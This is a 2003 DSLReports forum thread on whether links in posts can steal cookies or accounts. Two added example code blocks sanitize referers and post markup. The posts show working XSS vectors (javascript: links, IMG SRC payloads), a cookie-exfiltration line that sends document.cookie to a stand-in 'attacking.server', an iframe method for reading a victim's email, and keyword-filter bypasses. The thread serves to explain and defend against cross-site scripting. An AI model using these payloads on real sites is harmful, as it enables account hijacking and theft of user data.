Sarick It's Only Logical Premium join:2003-06-03 USA
DSLreports Clicking a link in forums?
Could clicking a link in DSLreports allow someone to steal your DSLreports password or cookie to get your email?
I've been told that is a security flaw by an admin of a very popular site. CjayC Gamefaqs.com
Anyone?
Sarick It's Only Logical Premium join:2003-06-03 USA
·FrontierNet Intern..
No really.
If you're on a site, then the link you click on, if it's inside that site and you're ON that site because it's friendly, then isn't there a chance that they could call a cookie from your computer? You are clicking on a link that is on DSL reports.
I'm thinking it might be possible; don't get me wrong, the cookies work with IP addresses. Check GRC.com and run the cookie test. If you click on a link at this site there might be a way to trick IE into sending the URL host your cookie info.
This is a security forum; unless you know the ins and outs, don't dog this possible risk. I'm looking for people who want to find security risks.
Lucif4 Premium join:2000-12-12 clubs:
Re: DSLreports Clicking a link in forums?
The program I believe you are talking about is IDServe. Correct?
said by Steve Gibson: Additional applications for ID Serve:
Simple Cookie Scout: If you are curious about the appearance, format, expiration, and use of a web site's browser cookies, ID Serve can be a convenient way to examine a web site's cookies without either providing or accepting that site's cookies. Simply scroll back through the "Server query processing" window to examine the "Cookie:" header lines sent by the site's web server.
Did you see a cookie header line? Why do you think this is a security risk here at DSLReports? -- Aim low, shoot high.
Randy Bell Premium join:2002-02-24 Santa Clara, CA
Re: DSLreports Clicking a link in forums?
said by Lucif4 : The program I believe you are talking about is IDServe. Correct? .. Did you see a cookie header line? Why do you think this is a security risk here at DSLReports?
I see no cookie header line .. -- "But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)
nil Java Geek join:2000-11-27
Host: Webmasters and Dev.. Forum Feature Requ..
The password isn't stored in a cookie.. neither is the email address, so even if clicking a link could get your cookie it wouldn't do that..
There are more security features.. just having someone's cookie isn't enough. -- Life is too short to be boring
nil Java Geek join:2000-11-27
Host: Webmasters and Dev.. Forum Feature Requ..
Re: DSLreports Clicking a link in forums?
That's still just a link.. just mislabeled.. and that doesn't steal a cookie!
This has nothing to do with intelligence.. just experience and knowledge of HTML & the internet. -- Life is too short to be boring
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
There actually IS a way that a password to a forum you are visiting could be stolen by a link in a post on that forum...
Some forums - thankfully, not many - actually include your password in the query string (in the URL, basically). Some of them do this as a way to avoid having to use cookies at all.
The problem is, if every page you visit on a site includes that, if someone puts a link in a post to their site, and you click that link, their website logs will show the 'referer'... that is, the web page that contained the link that you clicked on to arrive at their site. The 'referer' includes the entire URL of the page that had the link... meaning if your username/password are stored in the query string, they will be logged by the site you clicked through to as part of the 'referer'.
That site, however, does not use such a system, and of course, neither does BBR... so there's no trouble there. But if you are ever browsing a site that seems to show username/password up in the address bar, I'd be VERY careful about cross-site links.
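Added example, not code from the thread: what the Referer mechanism described in the post above actually carries when you click a cross-site link, plus the two things the receiving site can do about it (detect credential-looking parameters, and scrub them before they reach a log). Node.js built-in URL class only; the forum host, parameter names and values are constructed for the example.

```javascript
// Added example, not code from the thread: what the Referer mechanism
// described above carries, plus a defender-side check and log scrubber.
// Node.js built-in URL class only. The forum host, parameter names and
// values below are constructed for the example.

// Query parameter names treated as credentials (constructed list).
const SENSITIVE_PARAMS = ['password', 'passwd', 'pwd', 'pass', 'sessionid', 'token'];

// The Referer a 2003-era browser sends when you click a link on pageUrl:
// the full URL minus the fragment and any userinfo, query string included.
// (Current browsers default to a Referrer-Policy that trims cross-site
// referrers to the origin, but a site must not rely on that.)
function refererFor(pageUrl) {
  const u = new URL(pageUrl);
  u.hash = '';
  u.username = '';
  u.password = '';
  return u.href;
}

// Names of credential-like parameters present in a URL's query string.
function credentialParamsIn(url) {
  const u = new URL(url);
  return [...u.searchParams.keys()].filter(k => SENSITIVE_PARAMS.includes(k.toLowerCase()));
}

// Replace credential-like values before the URL is written to an access log,
// so a site that receives such a Referer does not persist someone else's password.
function redactForLog(url) {
  const u = new URL(url);
  for (const k of [...u.searchParams.keys()]) {
    if (SENSITIVE_PARAMS.includes(k.toLowerCase())) u.searchParams.set(k, 'REDACTED');
  }
  return u.href;
}

// Constructed sample: a forum that puts the login in every page's query string.
const forumPage = 'http://forum.example/viewthread.cgi?thread=42&user=alice&password=hunter2#post7';
const sentReferer = refererFor(forumPage);
console.log('Referer the linked site receives:', sentReferer);
console.log('Credential parameters in it:', credentialParamsIn(sentReferer));
console.log('What its log should record:', redactForLog(sentReferer));
```

The scrubber runs on the receiving side; the real fix is the one the post implies, which is never putting credentials in a query string in the first place, because a fragment-free URL with its full query is exactly what the Referer header is defined to carry.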
Smokey Even drunk on a bet ya make it to Canada Premium join:2003-05-20 Va Beach clubs:
·Cox HSI
Re: DSLreports Clicking a link in forums?
What the others were trying to tell you was that if you have set up your security correctly, you have little to no risk. If you are so concerned about it, you may want to set up a system that will not allow access to secure information. Ultimately it comes down to the user, and their own stupidity. Stupid people do not belong on the internet, as they often lead to the many problems that we have. Now I'm no expert, but I know that if I have no business on that site or on the links, DON'T CLICK ON THEM -- If there is any realistic deterrent to marriage, it's the fact that you can't afford divorce. -- Jack Nicholson
hpguru Curb Your Dogma Premium join:2002-04-12
For many users I think pressing the "On" button on their computers is a security risk.
Reverend Ike Premium join:2001-08-24 Sacramento, CA
Re: DSLreports Clicking a link in forums?
said by hpguru : For many users I think pressing the "On" button on their computers is a security risk.
Perhaps you should create a "special" Hpguru Hosts file for them.
4,294,967,295 entries ...
bobince
join:2002-04-19 DE
OK, here's the deal.
JavaScript (or any other web scripting language, eg. VBScript) is potentially dangerous. A script on a page can display your cookies, send your cookies to another server, pop up a window containing porn, make you post a message to the forums automatically... and so on.
For most sites this is not an issue because a script could only get onto the page by the site's author putting it there. Naturally DSLReports has no need to steal DSLReports's own cookies, and no inclination to harass us with pop-ups.
However, DSLReports, by operating this forum, is allowing us to add our own content to their web pages. For this reason the material we are allowed to post in a comment is limited. I can't just include a <script> tag and expect the script I put inside it to execute on everyone's machines, because that sort of thing is filtered out automatically.
The problem is that in practice it is actually rather tricky to filter out all code that could be used to 'inject' scripting content into a page. Most web forum software does not do it right at all.
One way to inject script into a page is by using a javascript: link:
<A HREF="javascript:alert();">innocent-looking-link</A>
If you try pasting that into a DSLR comment, you will get a link that opens a JS alert when you click on it.
<IMG SRC="javascript:alert()">
If you try pasting that into a DSLR comment, you will get a broken image, but the process of loading it will cause most browsers to execute the script, opening the alert again.
Judging by preview mode, the forum software used by DSLR *is* vulnerable to both these attacks. There are a couple of dozen other sneaky techniques for getting scripting content into documents that are supposed to be free of it too.
Of course opening an alert isn't very interesting in itself, but once you're in script like that, you can do anything a script on the site can - the typical example is to read the user's cookies and send them off to the attacker's server, where they will be used to hack accounts.
DSLR does not actually include the passwords in the cookies, and doesn't allow the password to be changed without the old password being entered, so this wouldn't give an attacker the ability to steal accounts wholesale, but it *would* allow them to post as the victim, change the victim's details, etc. And if the victim is a site administrator everything is up for grabs.
-- Andrew Clover mailto:and@doxdesk.com »www.doxdesk.com/
nil Java Geek join:2000-11-27
Host: Webmasters and Dev.. Forum Feature Requ..
Re: DSLreports Clicking a link in forums?
said by bobince : DSLR does not actually include the passwords in the cookies, and doesn't allow the password to be changed without the old password being entered, so this wouldn't give an attacker the ability to steal accounts wholesale, but it *would* allow them to post as the victim, change the victim's details, etc. And if the victim is a site administrator everything is up for grabs.
Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post.. -- Life is too short to be boring
bobince
join:2002-04-19 DE
Re: DSLreports Clicking a link in forums?
Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post..
Well, I am currently posting from a completely different browser, which I authorised by copying document.cookie from the original browser (as if hijacked from JavaScript). So I don't see any security measures that are stopping me from authorising myself as someone else.
And even if this weren't possible, an attacker could script an automatic make-a-post or do-an-admin-action attack, through cross-frame scripting.
-- Andrew Clover mailto:and@doxdesk.com »www.doxdesk.com/
nil Java Geek join:2000-11-27
Re: DSLreports Clicking a link in forums?
And you didn't have to re-enter your password? Plus it was from the same IP.. -- Life is too short to be boring
bobince
join:2002-04-19 DE
Re: DSLreports Clicking a link in forums?
And you didn't have to re-enter your password?
That is correct.
Plus it was from the same IP..
True, but I'd be surprised if the software requires the IP address to stay constant for one user, as that would completely break the site for eg. AOL users, whose apparent IP address can change on every request.
Even if cookie-stealing didn't give access to accounts (and it's actually very tricky to arrange something like that), just allowing JavaScript through from user-submitted content is enough to compromise the security of the board. It is this that is the real problem.
Filtering JavaScript out completely is not a trivial task, and most forum software is vulnerable to JS injection (cross-site scripting, XSS) one way or another - search Bugtraq for a large yet incomplete list of known forum vulnerabilities. The software DSLR is using seems to fall to at least one method of JS injection (namely javascript: pseudo-URIs) that is extremely simple and well-known, though.
Or at least I assume so - such exploits make it through the preview; I haven't tried posting them to a live thread. I can try if you like, hope you don't mind the alert() boxes.
(Incidentally, javascript: URIs are one of the worst ever ideas, and have caused endless security holes in web browsers and sites alike, whilst offering zero actual new utility to web authors. Whichever clever-trousers @netscape came up with them desperately needs a kick to the face!)
-- Andrew Clover mailto:and@doxdesk.com »www.doxdesk.com/
nil Java Geek join:2000-11-27
Re: DSLreports Clicking a link in forums?
I do believe it gets stripped out on posting.. it may show up in preview.. but go ahead.. give it a try.. -- Life is too short to be boring
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Re: DSLreports Clicking a link in forums?
Alrighty:
Admin: Feel free to edit this post once the concept is proven. [text was edited by author 2003-07-21 16:37:19]
[Edit: okay, we need to work on that I guess - nil ] [text was edited by moderator]
Sarick It's Only Logical Premium join:2003-06-03 USA
Re: DSLreports Clicking a link in forums?
My dad passed away about 20 years ago.
Sarick It's Only Logical Premium join:2003-06-03 USA
So in your best judgement DSLreports does have a security vulnerability.
It seems a few people who are on this thread thought that this flaw was an urban legend.
Sarick It's Only Logical Premium join:2003-06-03 USA
Hey, I didn't get to see it.
What happened? It seems you've proven that there is a security risk with the links. Unless you faked that moderator edit.
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Re: DSLreports Clicking a link in forums?
said by Sarick : Hey, I didn't get to see it.
What happened? It seems you've proven that there is a security risk with the links. Unless you faked that moderator edit.
Putting script for a JavaScript 'Alert' function worked when put in a URL, and when put in the SRC of an IMG tag. When put in the IMG tag, it caused the Alert to come up immediately on loading the page.
However, I'm still not convinced that this amounts to a security problem here, as I do not believe that JavaScript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno.
lysw1
join:2003-05-19 Jeffersonville, IN
Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?
Sarick It's Only Logical Premium join:2003-06-03 USA
·FrontierNet Intern..
Re: DSLreports Clicking a link in forums?
said by lysw1 : Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?
All this software for security. Seems like ActiveX should be X'ed
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Re: DSLreports Clicking a link in forums?
Did he say "X Box"?
lysw1
join:2003-05-19 Jeffersonville, IN
Yeah, except that some sites require it. (www.live365.com)
Sarick It's Only Logical Premium join:2003-06-03 USA
·FrontierNet Intern..
Scary stuff. Them tool points are hard to get. LOL
Actually I think it's a bigger security risk with the cookies now.
DSLreports has a security problem with the cookies. Yeah, some people's connections would bust, so the best solution would be multiple configs. That way people don't have it turned on if it conflicts.
Links however can prove to be nasty. I've tried to set IE to block ActiveX; it kills the browser! Then again that might be different now that PC-cillin is GONE. I found a glitch in its ActiveX web-blocking TMproxy that has been confirmed.
I noticed a file on my desktop the other day that had the address book main user identity list in it, a file named ~. I don't use Outlook and the address book, so that ActiveX must have let something in past spyware guard.
Microshaft, please fix your browser..
Jason Levine Premium join:2001-07-13 USA
Re: DSLreports Clicking a link in forums?
said by Sarick : Links however can prove to be nasty. I've tried to set IE to block ActiveX; it kills the browser!
I use MyIE2 (an IE "wrapper" program that adds tabbing, pop-up blocking, etc) and I can set it to not load ActiveX, Java, Images, etc. Of course, the better method is the one JayKayKay described of using the Trusted Zone for sites that need ActiveX and the Internet Zone for sites that don't need it. -- -Jason Levine http://www.jasons-toolbox.com/ http://www.PCQandA.com/ http://www.urateit.com/
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Umm.. something to add here:
I would be very, very careful about putting ANY website in the 'Trusted Zone'... in particular, I would never ever put a website that has forums in the 'trusted sites' zone... even my own forum site, I would never put in the Trusted Sites zone.
bobince
join:2002-04-19 DE
That's My Pet X wrote:
I'm still not convinced that this amounts to a security problem here, as I do not believe that Javascript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno.
It's not grabbing a file as such, it's grabbing everything that DSLR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed, sending it to another server is absolutely trivial, you just do any JavaScript operation that results in an HTTP request, and append the cookie to the URL. Often this is done with something like:
im = new Image(); im.src = 'http://attacking.server/logcookie.cgi?' + document.cookie;
but there are many other ways of doing it, which may work better in various circumstances.
lysw1 wrote:
Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?
No ActiveX controls as such, but there is a JavaScript that probes for various ActiveX controls being installed, in order to search for spyware and various other nasties.
-- Andrew Clover mailto:and@doxdesk.com »www.doxdesk.com/
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Re: DSLreports Clicking a link in forums?
said by bobince : It's not grabbing a file as such, it's grabbing everything that DSLR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed...
*SNIP*
STOP! right there! Back up... "It's grabbing everything that DSLR itself would have access to..."... That's where you lose me; I know that JavaScript can easily direct the browser to ANY webpage at all, anywhere in the world, and include any information in the querystring that it is able to get... that much is not at all in question... I write web pages that use JavaScript to do this almost every day..
What's in question is whether, under 'good' security settings, JavaScript would get "everything that DSLR itself would have access to" in the first place... how?
Simple question that'll answer this for me: All I ever use JavaScript for is form information validation, and navigation... so, does JavaScript actually have access to cookie values? By what mechanism?
If so, then I understand exactly what you are saying.
Oh.. and my name is "Marilla", not "That's my Pet X" hehe [text was edited by author 2003-07-25 01:43:12]
bobince
join:2002-04-19 DE
Re: DSLreports Clicking a link in forums?
Marilla wrote:
What's in question is whether, under 'good' security settings, Javascript would get "everything that DSLR itself would have access to" in the first place... how?
Because a script included in a page at example.com is allowed to make a connection to example.com under user credentials, take any action the user can take manually, and read the contents of the returned document.
So for example if I want to find out your real e-mail address, I can include a JavaScript hack in this posting that adds an invisible iframe to the page, sets its location to www.dslreports.com/prof, and accesses (iframe).document.forms[0].elements['email'].value.
Similarly I can script the elements in an iframe to make you post something, add something to your profile, or whatever. The only thing I can't do is grab your password, because the browser doesn't send your password and DSLR never returns it.
Simple question that'll answer this for me: All I ever use Javascript for is form information validation, and navigation...
Do you mean as a site user or a site author?
As a site author you don't usually have to worry about your own scripts; as long as they don't accept user input and add it to the page, they're pretty much safe. What you have to worry about, if you have a forum, is ensuring that other people can't sneak their own scripts onto your pages by means of posting hacks.
so, does Javascript actually have access to cookie values? By what mechanism?
The 'cookie' property of the 'document' object. eg. try entering javascript:alert(document.cookie) into the address bar.
There are perfectly good reasons for allowing JavaScript to read and set cookies. (For example I use it to implement a hash-based authentication mechanism for when HTTP Digest Authentication isn't available.) The problem is only when a site allows scripts on it that aren't controlled by that site.
-- Andrew Clover mailto:and@doxdesk.com http://www.doxdesk.com/
Marilla I Am My Own Arbiter Premium join:2002-12-06 Belpre, OH
Re: DSLreports Clicking a link in forums?
Thank you... you answered my questions! As I noted, I use JavaScript a LOT, but usually just to validate forms input - say, to pop up an 'alert' when a required field is missing, so as to avoid a trip to the server, which will only complain about the same thing... and I use it for "Go Back" links, with the history.go(-1) thing, and that's pretty much it...
So I really wasn't aware of what, if any, options there were for accessing stuff like this.... what functions and such JavaScript provided which would allow for such information to be gotten... Because a forum like this essentially allows a user to 'write web pages' on the site, I see what you mean, and I very much agree that filters should be added to remove such things (one nice thing about JavaScript: it's VERY picky about things like capitalization and such, so functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts).
And now that you've pointed this out, I'll be adding some more such functions to my OWN public forum system (I programmed my own system that people pay a small fee to customize and use on their sites)... it currently filters out many client-side script things, but this discussion has made me consider a possibility that I'm not sure I covered... so I'll be looking into that to make sure my own users are not exposed to such possible exploits.
bobince
join:2002-04-19 DE
functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts.
Ehh. I'm not sure it's worth bothering too much with this. Almost all blocks of this kind are pretty easy to get around.
Say you block the word 'cookie'; I can use document['coo'+'kie'] instead. You block 'document', I use eval('do\x63ument'). And so on. If an attacker has a Turing-complete programming language at their fingertips, you're onto a loser.
Easier is to try to prevent scripting content getting through at all. Although it's still quite difficult, as is demonstrated by the vulnerability of the vast majority of fora out there, including DSLR!
The basics:
* Limit special markup to as few features as possible and make sure they must be matched exactly. If using HTML-style markup, do not allow any attributes to be submitted other than required ones, and require input in a fixed form. Ideally, avoid allowing HTML-style markup in posts at all.
* HTML-encode all text and values included in attributes (eg. URLs in images) on output. There should be no avenue for the poster to get a literal ampersand, quote or left angle bracket into a post.
* If links or images are allowed, disallow any URL method not known-good (http, https, ftp). There are more URL types that can be dangerous than just javascript:.
* Ensure the character set of the final page the untrusted input will appear in is stated, either in the HTML or HTTP headers. If the character set is UTF-8, ensure invalid character sequences cannot be output, for example by storing the posting itself as 16-bit-wide character strings.
(Apologies for the boringness of this post!)
-- Andrew Clover mailto:and@doxdesk.com »www.doxdesk.com/
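Added example, not code from the thread or from DSLR's forum software: a post sanitizer that applies the first three of the basics listed above (a minimal fixed markup set, HTML-encoding of all text and attribute values on output, and a known-good URL scheme allowlist). It also covers the bypasses earlier in the thread, such as entity-encoded or whitespace-split scheme names, by normalizing a URL before checking it. The allowed tag set (b, i, a, img), the entity table and the sample post are choices made for this example. Plain Node.js, no dependencies.

```javascript
// Added example, not code from the thread or from DSLR's forum software: a
// post sanitizer that follows the basics listed above. Allowed markup is
// <b>, <i>, <a href="..."> and <img src="...">; everything else, including
// text, is HTML-encoded on output, and URLs are normalized before a scheme
// allowlist (http, https, ftp) is applied. Plain Node.js, no dependencies.

const ALLOWED = { b: [], i: [], a: ['href'], img: ['src'] };   // tag -> required attributes
const SAFE_SCHEME = /^(?:https?|ftp):\/\/[^\s<>"']+$/i;
const ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that could open a tag or end an attribute value.
function encodeHtml(s) {
  return s.replace(/[&<>"']/g, c => ENTITY[c]);
}

// Undo entity forms a poster could use to disguise a scheme (&#106;avascript:,
// jav&#x09;ascript:), then strip control characters and whitespace, which
// browsers ignore inside URLs. The result is checked, never used raw.
function normalizeUrl(raw) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };
  const fromCode = n => (n > 0x10ffff ? '' : String.fromCodePoint(n));
  const s = raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&([a-z]+);?/gi, (m, n) => named[n.toLowerCase()] ?? m);
  return s.replace(/[\u0000-\u0020\u007f]/g, '');
}

// Returns the normalized URL if its scheme is on the allowlist, otherwise null.
function safeUrl(raw) {
  const u = normalizeUrl(raw);
  return SAFE_SCHEME.test(u) ? u : null;
}

// Parse one raw tag into { close, name, attrs }, or null if it is malformed.
function parseTag(tag) {
  const m = /^<\s*(\/?)\s*([a-z][a-z0-9]*)\s*([\s\S]*?)\s*\/?\s*>$/i.exec(tag);
  if (!m) return null;
  const attrs = {};
  const re = /([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let a;
  while ((a = re.exec(m[3])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
  return { close: m[1] === '/', name: m[2].toLowerCase(), attrs };
}

// Sanitize a post body. A tag that is unknown, lacks its required attribute,
// or carries an unsafe URL is shown literally (encoded) instead of rendered.
function sanitizePost(input) {
  const out = [];
  const depth = { b: 0, i: 0, a: 0 };                 // open tags awaiting a close
  for (const tok of input.split(/(<[^<>]*>)/)) {      // alternating text / tag tokens
    const t = tok.startsWith('<') ? parseTag(tok) : null;
    if (!t || !(t.name in ALLOWED)) { out.push(encodeHtml(tok)); continue; }
    if (t.close) {
      if (depth[t.name] > 0) { depth[t.name]--; out.push(`</${t.name}>`); }
      else out.push(encodeHtml(tok));                 // stray or unbalanced close tag
      continue;
    }
    let attrText = '';
    let rejected = false;
    for (const name of ALLOWED[t.name]) {
      const url = t.attrs[name] === undefined ? null : safeUrl(t.attrs[name]);
      if (url === null) { rejected = true; break; }
      attrText += ` ${name}="${encodeHtml(url)}"`;  // only the allowlisted attribute survives
    }
    if (rejected) { out.push(encodeHtml(tok)); continue; }
    if (t.name in depth) depth[t.name]++;
    out.push(`<${t.name}${attrText}>`);
  }
  return out.join('');
}

// Constructed sample post mixing legitimate markup with the two vectors
// discussed in the thread.
const samplePost = 'Try <a href="http://www.example.com/">this</a>, '
  + '<A HREF="javascript:alert();">innocent-looking-link</A> and '
  + '<IMG SRC="javascript:alert()"> <b>bold</b>';
console.log(sanitizePost(samplePost));
```

The design follows the order of the list: the tokenizer only ever emits a tag the allowlist knows, with only its one required attribute, so the word-blocking approach the post argues against is never needed; and because rejected tags are re-emitted through encodeHtml rather than dropped, a poster sees exactly what was refused without any of it reaching the browser as markup. The fourth point (declaring the page's character set and refusing invalid UTF-8 sequences) belongs in the HTTP layer and storage, not in this function.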
Sarick It's Only Logical Premium join:2003-06-03 USA
Re: DSLreports Clicking a link in forums?
Why can't all image links be locked to image files? (already done)
And all web URLs be clear text, so if you want to link to them you cut and paste. That might help, right?
At least until the security risk is fixed.
ChrisXP United We Stand, Divided We Fall Premium join:2002-12-13 USA
Re: DSLreports Clicking a link in forums?
This is a very informative thread.
Takes a while to get through the roadblocks, but once it does get through, progress is made.
Good job, Sarick, good job! And I love your quote:
"I know I'm not Stupid, A stupid person doesn't ask questions."

CXP -- "It's not what you see that's suspect, but how you interpret what you see." ~~~ Isaac Asimov Remember 9/11: Bodies found "intact": 289 Body parts found: 19,858 Families who received no remains: 1,717